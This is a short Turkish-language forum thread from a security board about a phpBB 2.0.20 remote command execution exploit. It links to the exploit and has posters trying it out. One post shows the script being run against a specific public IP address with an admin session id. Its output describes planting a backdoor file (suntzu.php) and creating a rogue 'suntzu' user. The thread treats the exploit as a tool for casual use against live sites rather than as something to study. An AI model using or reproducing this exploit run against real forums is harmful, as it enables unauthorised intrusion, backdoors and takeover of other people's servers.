folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Phpbb 2.0.20 Remote Exploit



Phpbb 2.0.20 Remote Exploit

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek
    fistana özendim ben de küfretcem alın aq

    http://www.milw0rm.com/exploits/1780

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fikibok
    KaptaN
    KaptaN's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 30/Ağustos/2005
    Erkek
    abü bu yenilrmi içilirmi demiyecem

    http://www.tahribat.com/doc.asp?docid=38
    http://www.tahribat.com/doc.asp?docid=49
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek
    deneyek bakam eywallah

    Amphetamine Logic.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek
    bu saatte ya ben yanlıs yapıom uykuluyum :D yada line 1 de sorun var :)

    Amphetamine Logic.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek
    Ben çalıştırdım. Kullanabilmek için admin'in sessid bilgisi gerekiyor.

    xxx@xxx ~ $ php phpbb.php 83.137.192.245 / 7d86cc9f4ba244d77cacc28c0e0d3c59 ls
    PhpBB <= v2.0.20 "Admin/Restore Database/default_lang remote commands execution
    by rgod rgod@autistici.org
    site: http://retrogod.altervista.org
    -> you need an admin sid, works regardless of magic_quotes_gpc settings
    tested and working against a fresh PhpBB installation

    step 0 -> check if suntzu.php is already installed...
    Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...
    step 0c -> query database to create a "suntzu" user with password "suntzu"...
    Unable to modify table... maybe wrong admin sid
Toplam Hit: 13700 Toplam Mesaj: 5